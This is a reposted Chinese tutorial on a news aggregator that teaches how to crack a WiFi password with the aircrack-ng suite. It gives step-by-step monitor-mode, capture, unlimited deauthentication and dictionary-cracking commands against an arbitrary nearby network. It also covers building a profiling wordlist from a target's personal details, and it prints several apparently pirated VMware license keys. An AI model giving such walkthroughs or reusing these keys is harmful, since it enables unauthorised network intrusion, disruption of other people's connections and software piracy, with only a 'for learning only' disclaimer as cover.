Redian新闻
>
网络安全,WiFi 密码爆破教程,建议收藏吃灰

网络安全,WiFi 密码爆破教程,建议收藏吃灰

公众号新闻

转自:入门小站  来源:CSDN

文章仅限学习使用

前言

暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。

本文我们采用最原始的暴力破解方式,演示如何破解 WiFi 密码。

一、什么是暴力破解?

暴力破解就是利用所有可能得字符组密码,去尝试破解。这是最原始,粗暴的破解方法,在理想状态下,最终一定会爆破出密码。

字符集           密码位数             密码可能性
[0-9]             8位            10^8=100000000
[0-9][a-z]        8位          36^8=2821109907456
[0-9][a-z]       1-8位      .............................

但是高达几千亿的密码种类,这样的方法显然不现实,所以出现了字典破解的方式。

字典破解就是通过比较合理的条件,筛选或者过滤掉一些全字符组合的内容,大幅降低爆破的成本。

字典有很多种,比如 Web 网站密码字典、[WiFi 密码字典]、操作系统用户密码字典、数据库密码字典、子域名字典、默认账号密码字典、弱口令字典、社工字典等等。

针对我们要破解的 WiFi 密码,WiFi 密码字典和社工字典是最好的选择。

WiFi 密码字典,顾名思义就是存放大量 WiFi 密码的字典。

但是 WiFi 密码字典没有针对目标本身进行生成,具有普遍性,从而导致无法精准打击目标。

社工字典,是通过我们输入攻击目标的一些关键信息,经过社会工程学的分析,可以针对该目标生成定制化的字典。

假如我对目标的已知信息如下,

  • 1.名字
  • 2.身份证号
  • 3.手机号
  • 4.微信号
  • 5.QQ 号
  • 6.游戏账号
  • 7.各大平台账号
  • 8.生日
  • 9.email
  • 10.外号
  • 11.亲戚朋友恋人名字
  • 12.曾经用过的密码
  • 13.… …

通过计算,得到社工字典

推荐字典下载链接: https://weakpass.com/download

或者在 github 搜索:字典、dict、wordlist 之类的关键词,有许多字典可以下载。

字典虽多,但由于破解方式的局限性,无法保证随便找的一个字典就可以破解任意 WiFi。

最好的办法是社工 + 弱口令。

将社工字典和自己收集的弱口令进行随机排列组合,扩大命中率。

拥有社工字典之后,我们开始准备暴力破解需要的工具

1.VMware pro16 虚拟机 2.kali-linux 2022 操作系统(搭载在虚拟机中) 3.kali 监听无限网卡

本文我们采用最原始的暴力破解方式,演示如何破解 WiFi 密码。


二、准备破解工具

1.VMware Pro 16 虚拟机安装

百度网盘下载链接:https://pan.baidu.com/s/1z4K-OKnMTa0xuOZbf1F7qQ?pwd=rhy2

提取码:rhy2

VMware 16密钥

ZF3R0-FHED2-M80TY-8QYGC-NPKYF

YF390-0HF8P-M81RQ-2DXQE-M2UT6

ZF71R-DMX85-08DQY-8YMNC-PPHV8

安装操作省略

2.VMware 安装 Kali Linux

官网下载链接:https://linux.softpedia.com/get/System/Operating-Systems/Linux-Distributions/Kali-Linux-97645.shtml

Kali Linux 安装教程: http://t.csdn.cn/pWANe

3.kali 监听无限网卡

直接在某宝或某多多搜索:kali 监听无限网卡

黑客入门必备的工具,非常好用,感兴趣的朋友可以入手



三、WiFi 密码暴力破解


1.虚拟机连接 USB 网卡


首先进入 kali 系统

打开命令行窗口,查看网卡信息

ifconfig

插入准备好的 kali 网卡,选择连接到虚拟机,选择 kali

再次检查网卡信息

ifconfig

出现 wlan0 后证明检测到无限网卡

启动网卡,开启网卡监听

airmon-ng start wlan0

再次检查网卡

ifconfig

出现 wlan0mon 后证明网卡监听服务准备就绪


2.扫描附近 WiFi


airodump-ng wlan0mon

使用 airodump-ng 命令列出无线网卡扫描到的 WiFi 热点详细信息,包括信号强度,加密类型,信道等。

这里我们记下要破解 WiFi 的 BSSID 和信道,下图中我用蓝色标记。当搜索到我们想要破解的 WiFi 热点时可以 Ctrl+C 停止搜索。

这里我们破解 MERCURY_72C0 的网络密码


可以看到,该网络的物理地址为 1A:2B:3C:4D:5E:6F,当前信道为 11

注:安全起见,此处物理地址仅供参考

编造地址为 1A:2B:3C:4D:5E:6F


3.查看目标 WiFi 连接设备


airodump-ng --bssid 1A:2B:3C:4D:5E:6F -c 11 -w /home wlan0mon


注:airodump-ng 列出网络详细信息

 -c 指定信道,上面已经标记目标网络的信道

 -bssid指定目标路由器的BSSID

 -w指定抓取的数据包保存的目录

可以看到,目的网络下出现了三台已经连接的设备

我们选择第一台设备

物理地址为 12:34:5H:7K:1E:9F

切勿停止该进程

4.抓包


新建一个命令行窗口

输入命令

aireplay-ng -0 0 -a 1A:2B:3C:4D:5E:6F -c 12:34:5H:7K:1E:9F wlan0mon


注: -0 冲突攻击模式,使客户端断开和路由器的连接
 0  攻击的次数,设置为0代表无限攻击,导致客户端一直无法连接路由器
 -a 路由器的MAC地址
 -c 连接设备的MAC地址

抓取包含 WiFi 密码的 ACK 握手包

Ctrl+C 退出抓包

返回上个命令行窗口,可以看到第三行,创建文件 / home-10.cap

已经获得数据包文件

在目录下找到数据包文件

5.破解


aircrack-ng -w /home/kali/Desktop/password.txt /home-10.cap

注:password.txt 社工字典
 home-10.cap 抓包文件

key found[**********] 找到密码

关闭 wlan 网卡

airmon-ng stop wlan0mon

上面演示的暴力破解 WiFi 密码说白了就是穷举法,将密码字典中每一个密码依次去与握手包中的密码进行匹配,直到匹配成功。

所以能否成功破解 wifi 密码取决于密码字典本身是否包含了这个密码。

破解的时间取决于 CPU 的运算速度以及密码本身的复杂程度。

如果 WiFi 密码设得足够复杂,即使有一个非常完美的密码字典,要想破解成功花上几周几个月甚至更久都是有可能的。

END

官方站点:www.linuxprobe.com

Linux命令大全:www.linuxcool.com

刘遄老师QQ:5604241

Linux技术交流群:3762708

(新群,火热加群中……)

想要学习Linux系统的读者可以点击"阅读原文"按钮来了解书籍《Linux就该这么学》,同时也非常适合专业的运维人员阅读,成为辅助您工作的高价值工具书!


微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
阳光沙滩担忧网络安全 德克萨斯大学禁用TikTok手笨的人,建议带孩子做这个手工!保成功(附教程在线分享孩子信息的父母存在网络安全风险,为什么2023年普通人自救指南,建议收藏2022年度全球网络安全发展态势研究报告学“狂飙”的网络安全,做最强盛的打工人!!新加坡O水准考录取截分10年数据汇总,建议收藏!惊艳你的6款神级设计|打破教堂的既定印象美国高级网络安全外交官称推特账户遭到黑客入侵【信息安全三分钟】2023.02.09今日起中国实施这6项新措!事关每个在新加坡的中国人,建议收藏变态封控结束了,余波还在【抓狂】网络安全专家:为啥加拿大人那么爱用“123456”作密码?!收藏夹吃灰!2 万字系统总结,带你实现 Linux 命令自由~麻醉前停药9大类(最全总结,建议收藏)寅冬玫瑰樱盛开守护网络安全 他们在行动爬藤成功与否和经验采集关系不大。而是在怀孕的一霎间就基本决定了。Kubernetes 1.26 版本正式发布:改进 Windows 支持,加强网络安全和管理功能系统性能优化的十大策略(强烈推荐,建议收藏)多措并举共建网络安全生态!彰显民企担当,他们在路上《2023 年电力安全监管重点任务》发布,网络安全再次被强调【信息安全三分钟】2023.02.04读《诗》:读 《柏舟》最新报告称 75% 的网民缺乏安全感,66% 的网民认为网络安全过于复杂【信息安全三分钟】2023.02.22拥有好心态的9个建议(建议收藏)2023移民加拿大选择哪个省份?最全攻略来了,建议收藏!提升自我的5件小事,建议收藏莫言说这位禁书作家比他更该得诺贝尔文学奖,罕见签名本,建议收藏有人用ChatGPT月入十万了!我们整理了70+款可以免费使用的AI工具,建议收藏选对不选贵!性价比超高的10款日常好物,建议收藏~2023年网络安全行业研究报告(附下载)过年随礼的四条老规矩,不可不知,建议收藏!被“渣”了,我们的「自我」会发生哪些变化?(内含自救方法,建议收藏)别再自己瞎写工具类了,SpringBoot 内置工具类应有尽有,建议收藏!!打造下一代网络安全靶场产品,「丈八网安」完成数千万元级别A轮融资|36氪首发
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。